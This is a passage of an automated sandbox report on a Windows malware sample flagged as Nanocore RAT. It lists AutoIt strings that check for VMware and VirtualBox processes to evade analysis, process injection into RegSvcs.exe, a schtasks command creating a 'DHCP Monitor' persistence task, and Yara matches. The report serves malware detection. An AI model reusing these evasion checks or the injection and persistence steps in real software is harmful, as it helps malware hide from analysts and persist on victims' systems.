        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: rocessExists("VboxService.exe") ThenFa3
        Source: bspmflqee.pif, 00000004.00000003.391658256.0000000003485000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenz3t
        Source: bspmflqee.pif, 00000004.00000003.392667734.0000000003487000.00000004.00000001.sdmpBinary or memory string: e("d:\") < 1 And ProcessExists("VMwareService.exe") Thenz3t
        Source: bspmflqee.pif, 0000001D.00000003.520888410.0000000003461000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then#
        Source: bspmflqee.pif, 0000000C.00000003.428154703.0000000003CC4000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then014
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe65687
        Source: bspmflqee.pif, 00000016.00000002.487179748.0000000003C8B000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
        Source: bspmflqee.pif, 0000000C.00000003.428154703.0000000003CC4000.00000004.00000001.sdmpBinary or memory string: rocessExists("VboxService.exe") ThenQ
        Source: bspmflqee.pif, 0000000C.00000003.427948997.0000000003CC1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenQ
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe~
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thendn
        Source: bspmflqee.pif, 00000016.00000003.480920883.0000000003C85000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe"
        Source: bspmflqee.pif, 00000004.00000003.391658256.0000000003485000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Thenl
        Source: bspmflqee.pif, 0000001D.00000003.520888410.0000000003461000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenFa3
        Source: bspmflqee.pif, 00000004.00000003.391658256.0000000003485000.00000004.00000001.sdmpBinary or memory string: rocessExists("VboxService.exe") Thenkt
        Source: bspmflqee.pif, 0000000C.00000002.433919050.0000000003CEB000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe/G
        Source: bspmflqee.pif, 00000016.00000002.487179748.0000000003C8B000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe3A765687
        Source: bspmflqee.pif, 00000016.00000003.476478888.0000000003C61000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Thenv
        Source: bspmflqee.pif, 00000004.00000003.392844303.00000000034A3000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exel
        Source: bspmflqee.pif, 00000004.00000003.393299923.00000000034AB000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe>
        Source: bspmflqee.pif, 0000000C.00000002.433919050.0000000003CEB000.00000004.00000001.sdmp, bspmflqee.pif, 00000016.00000003.480920883.0000000003C85000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe
        Source: bspmflqee.pif, 0000000C.00000003.428154703.0000000003CC4000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenv
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe5FB536C7(
        Source: bspmflqee.pif, 0000000C.00000003.427948997.0000000003CC1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Thenf
        Source: bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: VboxService.exe
        Source: bspmflqee.pif, 0000000C.00000003.428154703.0000000003CC4000.00000004.00000001.sdmp, bspmflqee.pif, 00000016.00000003.476598437.0000000003C64000.00000004.00000001.sdmp, bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8D353 VirtualQuery,GetSystemInfo,1_2_00D8D353
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00D7A2DF
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D99FD3 FindFirstFileExA,1_2_00D99FD3
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00D8AFB9
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FC399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_00FC399B
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00F9EE30 LoadLibraryA,GetProcAddress,4_2_00F9EE30
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D96AF3 mov eax, dword ptr fs:[00000030h]1_2_00D96AF3
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D8E4F5
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D9ACA1 GetProcessHeap,1_2_00D9ACA1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8E643 SetUnhandledExceptionFilter,1_2_00D8E643
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D8E4F5
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D8E7FB
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D97BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D97BE1
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FAA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00FAA128
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FA7CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00FA7CCD

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11A0000 protect: page execute and read and writeJump to behavior
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11A0000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: E2C000Jump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeProcess created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif 'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ijeJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp8F04.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp94A3.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00F9D7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,4_2_00F9D7A0
        Source: bspmflqee.pif, 00000004.00000003.392844303.00000000034A3000.00000004.00000001.sdmp, RegSvcs.exe, 00000005.00000002.570161580.0000000002350000.00000002.00020000.sdmp, bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: RegSvcs.exe, 00000005.00000002.570161580.0000000002350000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RegSvcs.exe, 00000005.00000002.570161580.0000000002350000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: bspmflqee.pif, 0000000C.00000003.431792148.0000000003CE5000.00000004.00000001.sdmpBinary or memory string: Program ManagerbC)
        Source: bspmflqee.pif, 00000004.00000003.391658256.0000000003485000.00000004.00000001.sdmp, bspmflqee.pif, 0000000C.00000003.428154703.0000000003CC4000.00000004.00000001.sdmp, bspmflqee.pif, 00000016.00000003.476598437.0000000003C64000.00000004.00000001.sdmp, bspmflqee.pif, 0000001D.00000003.521092666.0000000003465000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
        Source: bspmflqee.pif, 00000016.00000003.480920883.0000000003C85000.00000004.00000001.sdmpBinary or memory string: Program Managerl
        Source: RegSvcs.exe, 00000005.00000002.570161580.0000000002350000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: bspmflqee.pif, 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_00D89D99
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8E34B cpuid 1_2_00D8E34B
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,1_2_00D8CBB8
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FAE284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_00FAE284
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7A995 GetVersionExW,1_2_00D7A995

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
